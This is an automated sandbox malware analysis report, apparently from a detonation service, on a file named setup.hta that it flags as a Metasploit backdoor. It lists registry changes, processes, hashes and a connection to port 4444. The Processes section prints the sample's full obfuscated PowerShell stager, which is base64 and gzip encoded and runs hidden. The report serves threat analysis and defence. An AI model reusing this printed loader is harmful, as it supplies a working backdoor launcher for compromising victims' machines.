Malware Analysis Report

2024-09-23 03:59

Sample ID 240531-ws29nshb25
Target setup.hta
SHA256 6101bca566955a1ff83fe145187fd0665dcc6f362364256c1f4b4842f3ad0f20
Tags
metasploit backdoor execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6101bca566955a1ff83fe145187fd0665dcc6f362364256c1f4b4842f3ad0f20

Threat Level: Known bad

The file setup.hta was found to be: Known bad.

Malicious Activity Summary

metasploit backdoor execution trojan

MetaSploit

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-31 18:11

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 18:11

Reported

2024-05-31 18:12

Platform

win10v2004-20240508-en

Max time kernel

41s

Max time network

45s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\setup.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "137" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\setup.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARwBmAHsAMQB9AFcARwBZAEMAQQA3AFYAVwArADIALwBhAFMAQgBEACsAdgBWAEwALwBCADYAdABDAHMAbABFAEoATgB7ADEAfQA4ADIAVABhAFIASwB0ADcAYgBqAFEAQgBLAEkAaQBYAGsARQBLAEQAcAB0ADcATQBYAGUAcwBQAFkAUwBlAHcAbQBoAHYAZgA3AHYATgAyAHQAdwBIAGkAcQBwAGMAaQBmAFYARQBzAGsAKwBaAG0AWgBuAHYALwBsAG0AWgB1AGUAcgB4AEIAZQBVAEoAMAByAGMAUABYAE8AVQBIACsALwBmAEsAYgB2AFAAeABTAG0ATwBGAGEAMQBFAGoASABGAEYASwBjAFgAcgBJADkAYwByAFAAKwAyAFcASABpAGEAVABSAFAAbQBxAGEARgBPADAAWABOAHsAMQB9ADgAeABqAFMAWgBIAFIAOQBiAHEAegBRAGwAaQB7ADIAfQBqAE8AcQA2AHsAMgB9AEUAewAxAH0AQwB3AGoAOABRADIAagBKAE4AUABLAHkAagAvAEsASwBDAEkAcABPAGIAaQA4AHUAUwBXACsAVQBIADQAewAxAH0AcABiACsAcgBwADQAegBmAFkATABZAFQAMgAxAGoAWQBqADQAaAB5AGcASgBKAEEANwBsADEAdwBIADAAdgBYAHEAdAA2AFMAVQBhAEcAcAAzADcANgBwADUAZQBsAEIAYgBWAFkAOQB1AFYAdABoAGwAbQBtAHEAdAA4AGsARQBpAGEAcwBCAFkAMgBwAFoAKwBWAG0AVwBCAC8AWQAzAFMANgBLAHAASABlAHEAbgBQAE8ATgB6AFUAUgAzAFIAcABGAEcAdgBEAHAASQBNAHoAJwAnACsAJwAnADAAawBYAHIATgAyAFQARABoACcAJwArACcAJwBFAFIARAB6AEkAVgBMAHYATgAwAG4AWgBTAEkAVgBaAHAAcwBiAHkAWABOAGIASQBVADAARgBZAFoAdQB5AG4AMABVAEIAQwBuAEoATQByAFcAaQBUAE8AVQBCADAAOQBuAHMATAAyADIANgBPAC8AMQAnACcAKwAnACcAcQBsAFEAZwBhAGsAMgB7ADEAfQA3AEUAUwBUAGwAUwA0ACsAawA5ADkAUQBuAFcAYgBXAEYAawA0AEMAUgBLAHoASwBmAGcAWgBZAG4AVQBwAHEARQBzADMASQAnACcAKwAnACcAWgB4AE8ANwA1AGcAbQBpAGwAWgBNAFYAWQBSAGYAawB2AFoAcgBRAHUAVwBSAGYAWQB2AFYAVgBKAGUANgA0AEUAVQBxADUASQB5AHgAVQBJADYAcAA1ADcAewAyAH0AbgBpAHcAWQBtAFMAcgBxAGUANQB4AFYAQgBLAGgARABOADgAagBHAFEARABBAG4AeABMAEQAZQBjAEcAZwArADAAOQA3ACsAUABPADAAVQBIAHoAVABmAEkAZQBBAHgANQByAEwATQA1AHEAcgBmAGwAVwBNAGkAdABLAEIAcwA3AEgAZwA2AFEAYQBtAHAAWAA2ADYASQB1AFgAWgBJADkANQBLAEsAWQBrAHEAYgA3AFYAVgBLAHgAUgBCADcAWQA3AEMAdwBuAFQASQBhAFQAQgA3AFUAbgA4AFIAKwA1AEoAQQBVAHUAUgAxAEgAdAB0AGsAVABoAE4AaQBiAHgASQBjAFUANwArAGcAcQByAFkAdgBIAEcAVABPAFMASQA1AEYAdABSAEQAcgBnAG4AZQBhAHUAJwAnACsAJwAnAHQAcwBnAGcAVQAwAFkAQwBiAEcAUQBBAEUAdABXAC8ASwBKADIARQBsAFAAeABxAEcAdQB1AEsAQQB0AEkAaQBuAHcASQBhAFEAWgBlAFEAYgBUAEwATAA1ADMAWgB4AGsAeABUADIAMABtAEgAeABBAEQAYwB7ADIAfQBnADQAMABMAGMAMABoAFEAVQBnAGgAdgBVAHUAJwAnACsAJwAnAEsAVABYAEcANgBuAEkATwBRAGEAagBHAGMAWgBSAFgARgBYAFUARwBHACsAaABYAEYASQA1AGkAUgB7ADEAfQBLAEsAZwBKAEsATwA3AEwAYgBRAFMAUABCACsAcQBUACsANQAyAFYAawB4AFEASAAyAGUAaQBNAEQAYwByAHYAdwBCAHoAewAyAH0ANgBqAEYAawAwAHkAawBLAHgAOABDAEMAJwAnACsAJwAnAGcARAAwAHYAUwBYAHgASwBXAFkAUwBqADQAcgBTAHsAMQB9AGcARQB4AE4AeAA0AE4AaQA4AFAAVgB2AFcAaABZAG0ARABGAEkARwA3AEIAMABEADkARwBBAEYAWQBtAEMASgB5AFIATgBVAHYAQQBUAEsARgBHAHUAZQBrAFMAMAA0AHkAVQBqAE0AVQBqAGsAMQBjAEoAaABPAEkAVABhAHMARQB1AE4AbgBGAFUANABKACcAJwArACcAJwBJAEcANgAxADgAbQBDAC8AMQB1AHkAUwAwAHcASwBNAEoANgA1AEMASQBIADIARwBCAGMAVgBaAFUAaABUAEEAWgBWAEgANABuAHQASAAvADgAZgA1AHYAOQBZAGIAYwBNAFIASwB5ACcAJwArACcAJwBTADQAawBXAHAARgBSAFUAMwBNAGoASgBPAGwATAA4AFYAbgAvAGMAQwBuAEoAdQBjAE0AbQBSAHkASQBWAGcASQBLAFQAOAB0AGoARQBHAGYAbgBjADMASgBZAFcANwBZAE4AKwBTAFYAMABFADMAOQBoAHUAZQBaAFEATQBGADcAVABXAFgAcwBPAHYAQQA3ADgAQgBiAGIAUwA1AGYAUgBpAGMAbgA5ADIAMgA5AEkANQB2AFoAZQA2AHAAOAB3AFgAUgAnACcAKwAnACcAewAyAH0AYgBqADIAdgAzAFMAUgBIADUAdwBGADUATQBnAGIATgB7ADEAfQBWADMAMABoAGEAVwBpADEAewAxAH0AOQBhAHAAagAnACcAKwAnACcATgB5AEQAZQBOAGYAagA0ACcAJwArACcAJwBPAHgANwBRAFcAaAAnACcAKwAnACcAZwBQAFUANgBrAGMAKwBNADEAeQA3AHAAWAB2AGoAegBLAEQAcgAxAGsAagBhADIAdAByAHcAbQA4ADMAVwB0AFkARQBhAGoAZQBaAGwAdwAxAGcAQQB7ADIAfQBGAEoAbgBnAFkASgB1AFQATgBjAFAARgB6AEMARwBHAG4AcAA1AFkAYgBZAHoAMAAyAGkAegBrAHoAUAByADYAbQBaAFUAewAyAH0AeQBZAGoAMQB0AEsAYgBUAGoAUQBmADgAYwB6ADcAUABMAFoAMQBYAFQAOABLAHMATgAzAFoASQBHAFQAeQB7ADEAfQBOAEgAWgBYACcAJwArACcAJwBOAGUAdQBlAEwALwBsAHgAMgBZAHoANABmAHEAUgAxAFYAeQBnAEUANABTAHMANQBHAFQAewAxAH0AbQBQAHgAOABiAEsAYgBJADEAWQBjACcAJwArACcAJwA0AFgAUABMADEAZQBXAGoAUwBlAG0AZwBoADAALwBFAHAAbQBmAFEARwBqAHQAbgByAE8AUwBZAGEAbgBOADcAZQAyAFUAewAyAH0ANgBxAEIAKwBOAHIAbgBGAGsAagB7ADEAfQBaADEATwBsAGwAZQBYADAAVQB3AHsAMgB9ADkAYQB0ADMAcgBsAHUATgBOAHMAQgArAGMANABuAGEAdwBEAHUAbABDAE0AYwBYAHsAMQB9AEYATQBhAE4AWAA5AGEAQQA0AHkAOQBrAHsAMgB9AGsAZgB1AHoAeQByAEkANABYAEoAawBjAG0AeQBEAGkAVABPADMAUQBhAGoAWgBlAE8AeQAyAEMALwBQADYAaAB6AE4ARwBUAHsAMgB9AGEANAB3AHUASgBoAHQASAAxADIAdABqAHQANABsAGEAQgBoACcAJwArACcAJwArAHsAMgB9AGgAcQBnAEgANABqAGcAMABlAHgAaABsADkALwBaADMAVwA2ADgATgBBAHgANgBNAFAAbgBYAEgAYwAzADEANAB6AFEANQAxADIAKwBxADUAMABiAFcAOABzADcANgBNADUAewAyAH0AOQAxAHkAegA3ADMASgA3AFcAMQBmADMAbgA0ADUAVwBKAEUAaAB6AEYASABBADEAMABmAGYAZwBCAFcAJwAnACsAJwAnAFQAQQBjADAARQBZADMANgByAEgAUwBIAGIAaQAxAFoATABOACsALwBLADkAMwBZADYALwBrAHoAYQByAHoAVwBDAGoAewAxAH0ANAB6AFMATABNAGcARABKAFEANAA0AHUATQB7ADIAfQBYAGoAcQA3AEsAcQAyAHkANgBuAFUAMABMAFMAOAAvAHkAOQBJAG0AaABBAEcASABSAE4ANgBhAGsARgAzAHgAQgBqADMAWgB7ADIAfQBlAEEAKwBnADcAOQBhAHQAdABGAFoARgBNAGIAdABIAE8AbgA5AHsAMQB9ADMASwB5AHEATgBnACsAYQBtAFgARgBFAHYASAB4AHgAUAB3AFUAVABZAFMAeQBlAC8AcQBCAFUAbABDAEUAVgBXAE0AaAA0AFoAaABRAEIAcwB3AEgAewAxAH0AeABtAG4AaQB4AHYAdgA1AHIARgBsAHgAdAB0AGEANgAwAGkATwAwAGsATwB6AHEATgA5AGwAdABzAEgAawAzAFMAdQBhAE4AcQBmAEIAdwB4AGUARABBAEkAcQAyAEcAdQBRAHYAWQBZAGUAbgBMAHkAQQBrAGcAUAAxAGIAMQBzAE0ASgBJAFkAbQA1ACsAdwA1AGcAcgB1AEwAUABmAEwAJwAnACsAJwAnAGgAQgBZAEMAQQBYAEEAMAB1AFAANQBXAFAAaABaAHcAcABZAE8ASwBBADMARQBHAFYAawBiADMAMABlAFcAOAB1AHgAVABoADcAVwBQACcAJwArACcAJwA1AFoAOQB1AHoAcQBXAGcAVAAvAGcAdAArAHoANQAyAG4AdABOADcAdAB2AFkAcABSAFIAMgBRAEwAMAB5AC8ATABMAGgAVwBlAHQANABBADgAQwBNAE0ASgBVAGcASwBRAEgAMQBaAG0AUgA3AFUATgBoAEgAdwA2ADcAaABIAGsAVwA0AHoAdwA0AGsAQQA3AHoAMwBTAHsAMgB9AGYAegBwAGMAcgBjAHsAJwAnACsAJwAnADIAfQBDAEYAbAAxAGoAZQBJAGYANABGAEUAdQBCAE4AOABiAFEATABBAEEAQQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAG8AJwAnACwAJwAnAGQAJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAGf{1}WGYCA7VW+2/aSBD+vVL/B6tCslEJN{1}82TaRKt7bjQBKIiXkEKDpt7MXesPYSewmhvf7vN2twHiqpcifVEsk+ZmZnv/lmZuerxBeUJ0rcPXOUH+/fKbvPxSmOFa1EjHFFKcXrI9crP+2WHiaTRPmqaFO0XN{1}8xjSZHR9bqzQli{2}jOq6{2}E{1}Cwj8Q2jJNPKyj/KKCIpObi8uSW+UH4{1}pb+rp4zfYLYT21jYj4hygJJA7l1wH0vXqt6SUaGp376p5elBbVY9uVthlmmqt8kEiasBY2pZ+VmWB/Y3S6KpHeqnPONzUR3RpFGvDpIMz'+'0kXrN2TDh'+'ERDzIVLvN0nZSIVZpsbyXNbIU0FYZuyn0UBCnJMrWiTOUB09nsL226O/1'+'qlQgak2{1}7ESTlS4+k99QnWbWFk4CRKzKfgZYnUpqEs3I'+'ZxO75gmilZMVYRfkvZrQuWRfYvVVJe64EUq5IyxUI6p57{2}niwYmSrqe5xVBKhDN8jGQDAnxLDecGg+097+PO0UHzTfIeAx5rLM5qrflWMitKBs7Hg6QampX66IuXZI95KKYkqb7VVKxRB7Y7CwnTIaTB7Un8R+5JAUuR1HttkThNibxIcU7+gqrYvHGTOSI5FtRDrgneau'+'tsggU0YCbGQAEtW/KJ2ElPxqGuuKAtIinwIaQZeQbTLL53ZxkxT20mHxADc{2}g40Lc0hQUghvUu'+'KTXG6nIOQajGcZRXFXUGG+hXFI5iR{1}KKgJKO7LbQSPB+qT+52VkxQH2eiMDcrvwBz{2}6jFk0ykKx8CC'+'gD0vSXxKWYSj4rS{1}gExNx4Ni8PVvWhYmDFIG7B0D9GAFYmCJyRNUvATKFGuekS04yUjMUjk1cJhOITasEuNnFU4J'+'IG618mC/1uyS0wKMJ65CIH2GBcVZUhTAZVH4ntH/8f5v9YbcMRKy'+'S4kWpFRU3MjJOlL8Vn/cCnJucMmRyIVgIKT8tjEGfnc3JYW7YN+SV0E39hueZQMF7TWXsOvA78BbbS5fRicn9229I5vZe6p8wXR'+'{2}bj2v3SRH5wF5MgbN{1}V30haWi1{1}9apj'+'NyDeNfj4'+'Ox7QWh'+'gPU6kc+M1y7pXvjzKDr1kja2trwm83WtYEajeZlw1gA{2}FJngYJuTNcPFzCGGnp5YbYz02izkzPr6mZU{2}yYj1tKbTjQf8cz7PLZ1XT8KsN3ZIGTy{1}NHZX'+'NeueL/lx2Yz4fqR1VygE4Ss5GT{1}mPx8bKbI1Yc'+'4XPL1eWjSemgh0/EpmfQGjtnrOSYanN7e2U{2}6qB+NrnFkj{1}Z1OlleX0Uw{2}9at3rluNNsB+c4nawDulCMcX{1}FMaNX9aA4y9k{2}kfuzyrI4XJkcmyDiTO3QajZeOy2C/P6hzNGT{2}a4wuJhtH12tjt4laBh'+'+{2}hqgH4jg0exhl9/Z3W68NAx6MPnXHc314zQ512+q50bW8s76M5{2}91yz73J7W1f3n45WJEhzFHA10ffgBW'+'TAc0EY36rHSHbi1ZLN+/K93Y6/kzarzWCj{1}4zSLMgDJQ44uM{2}Xjq7Kq2y6nU0LS8/y9ImhAGHRN6akF3xBj3Z{2}eA+g79attFZFMbtHOn9{1}3KyqNg+amXFEvHxxPwUTYSye/qBUlCEVWMh4ZhQBswH{1}xmnixvv5rFlxtta60iO0kOzqN9ltsHk3SuaNqfBwxeDAIq2GuQvYYenLyAkgP1b1sMJIYm5+w5gruLPfL'+'hBYCAXA0uP5WPhZwpYOKA3EGVkb30eW8uxTh7WP'+'5Z9uzqWgT/gt+z52ntN7tvYpRR2QL0y/LLhWet4A8CMMJUgKQH1ZmR7UNhHw67hHkW4zw4kA7z3S{2}fzpcrc{'+'2}CFl1jeIf4FEuBN8bQLAAA{0}')-f'=','o','d')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4396,i,1067197275908310731,12785105794523264014,262144 --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:8

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa391a855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
N/A 192.168.1.139:4444 tcp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

memory/624-0-0x0000000074BAE000-0x0000000074BAF000-memory.dmp

memory/624-1-0x0000000002DE0000-0x0000000002E16000-memory.dmp

memory/624-2-0x0000000005750000-0x0000000005D78000-memory.dmp

memory/624-3-0x0000000074BA0000-0x0000000075350000-memory.dmp

memory/624-4-0x0000000074BA0000-0x0000000075350000-memory.dmp

memory/624-5-0x00000000052E0000-0x0000000005302000-memory.dmp

memory/624-6-0x0000000005680000-0x00000000056E6000-memory.dmp

memory/624-7-0x0000000005D80000-0x0000000005DE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xbysx355.f1u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/624-17-0x0000000005DF0000-0x0000000006144000-memory.dmp

memory/624-18-0x0000000006390000-0x00000000063AE000-memory.dmp

memory/624-19-0x00000000063E0000-0x000000000642C000-memory.dmp

memory/624-20-0x0000000007CE0000-0x000000000835A000-memory.dmp

memory/624-21-0x00000000068D0000-0x00000000068EA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/624-25-0x0000000074BA0000-0x0000000075350000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c6f621538225aa3c87839b095fd74d5
SHA1 f0a16142c0dcaa6834a872147cb808118056b349
SHA256 6d11f09df8b9e309108cda0b2676c7be955e99823d221824e92bfb32f8a6d26a
SHA512 da0b7417da1eeaec087582b5f8cd98067e0e0493fb4bfbc4699b5a160735acad577a821e8c8380791098a74e0a97b52222d4c4b1b19cc36a6422304086f39183

memory/224-36-0x0000000006730000-0x0000000006731000-memory.dmp